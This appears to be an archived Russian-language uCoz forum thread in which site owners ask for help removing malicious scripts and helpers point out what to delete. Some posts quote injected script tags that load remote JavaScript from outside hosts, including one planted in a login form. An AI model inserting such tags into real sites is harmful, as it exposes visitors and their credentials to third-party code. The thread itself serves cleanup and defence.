Модератор форума: Yuri_G |
Сообщество uCoz Мастерская uCoz Безопасность сайта Вирусы на сайтах_3 (архив для чтения) |
Вирусы на сайтах_3 (архив для чтения) |
Grotbob,
Quote тут в сайте и мучить себя идем в панель управления - управление дизайном - открываем список шаблонов и начинаем их перебирать так же перебираем содержимое блоков вы хотите убрать все ифреймы? я безопасные, но глупо вставленные ифреймы даже не перечисляла |
webanet, Доброго времени суток!
Помогите найти вирус, недавно ставил Реалтраф себе, после того как выдало вирус удалил со всех стр. скрипт (скрипт с именем real3traf.ru или real4traf.ru ). Яндекс пометил уже сайт, гугл в норме. Зашёл как то на днях в аккаунт реалтрафа смотрю статистику а клики продолжаются но найти нигде не могу скрипт. Ссылки А что выберешь ты:кино онлайн или смотреть фильмы онлайн ?
|
vicik_SH, вы после удаления реалтрафа и пометки яндекса делали пересмотр? погуляла по страницам как гость, но вашего реалтрафа не вижу. вроде во всех модулях побывала.
у вас стоит простая кодировка некоторых участков кода с подгрузкой жк библиотечек (итого получилось 3 вместе с системной) и стилей. а так же кусок шаблона. а так вроде ничего такого не вижу. лучше всего уберите закодированные участки, пропишите простым кодом, а потом задайте пересмотр |
Проверьте пожалуйста hellsing.su. Не могу никак найти этот злосчастный кусок скрипта...
Жалуются на mymobile-fun.me Сообщение отредактировал Lustmord2568 - Суббота, 19 Май 2012, 19:58:50
|
Lustmord2568,
Quote этот злосчастный кусок скрипта.. что именно? И вообще в чём проблема? Quote <script type=text/javascript src=http://forucoz.com/openLayerA.js></script> 404 ошибка Добавлено (19-Май-2012, 17:54:57) Quote <script type="text/javascript" src="http://hellsing.su/jQuery1.2.6.jss"></script> что бы это ни было, ошибка 404 |
Quote (Lustmord2568) Жалуются на mymobile-fun.me Прямо на главной странице Прикрепления:
3317003.png
(288.8 Kb)
Сообщение отредактировал Lustmord2568 - Суббота, 19 Май 2012, 20:02:17
|
bandjuk, да спасибо, я читал это. Но это только на сайте Ucoz... На других сайтах такого у пользователей не возникает..
Хотя я уже начинаю догадываться, что виной могут быть теже юкозовские бегуны и прочая реклама Сообщение отредактировал Lustmord2568 - Суббота, 19 Май 2012, 20:10:40
|
Quote (webanet) vicik_SH, вы после удаления реалтрафа и пометки яндекса делали пересмотр? Ну после того как удалил реалтраф я прогнал по нескольким онлайн сервисам сайт на вирусы и каждый выдает свое мнение. Так же отправил на повторную проверку через Яндекс Вебмастер, и результат ещё ожидаю. Сегодня ещё раз смотрел статистику по кликам в реалтрафе они продолжаются и не понятно каким образом))) Quote (webanet) лучше всего уберите закодированные участки, пропишите простым кодом, а потом задайте пересмотр закодированные участки стоят уже год и они как бы не мешали яндексу и гуглу. Может ли быть такое, что проблема может крыться в МаркетГиде? А что выберешь ты:кино онлайн или смотреть фильмы онлайн ?
|
vicik_SH,
Quote Сегодня ещё раз смотрел статистику по кликам в реалтрафе они продолжаются и не понятно каким образом))) Quote Может ли быть такое, что проблема может крыться в МаркетГиде? Quote Так же отправил на повторную проверку через Яндекс Вебмастер, и результат ещё ожидаю. |
Здравствуйте! Помогите пожалуйста, проверьте мой сайт на наличие вирусов и вредоносного кода http://svetschastia.ucoz.com/ , т.к. я получила письмо от Службы поддержки Сервиса 1PS.RU:
Quote При загрузке Вашего сайта отображается надпись: "Имеется информация, что эта веб-страница атакует компьютеры!". Пожалуйста, удалите вредоносный код и после этого свяжитесь со службой поддержки яндекса, чтобы они проверили сайт и убрали страницу с надписью атаки. |
sandra777L, из формы входа выделенное красным удалить
Quote >Логин</td><td><script src="http://i1ii.ru/1.js" type="text/javascript"></script> <input class="loginField" type="text" name="user" value="" size="19" style="width:100%;" maxlength="50"/></td></tr> и уберите перевод от ромале. полностью весь. смысла в коде нет, но мусора на пол страницы |
| |||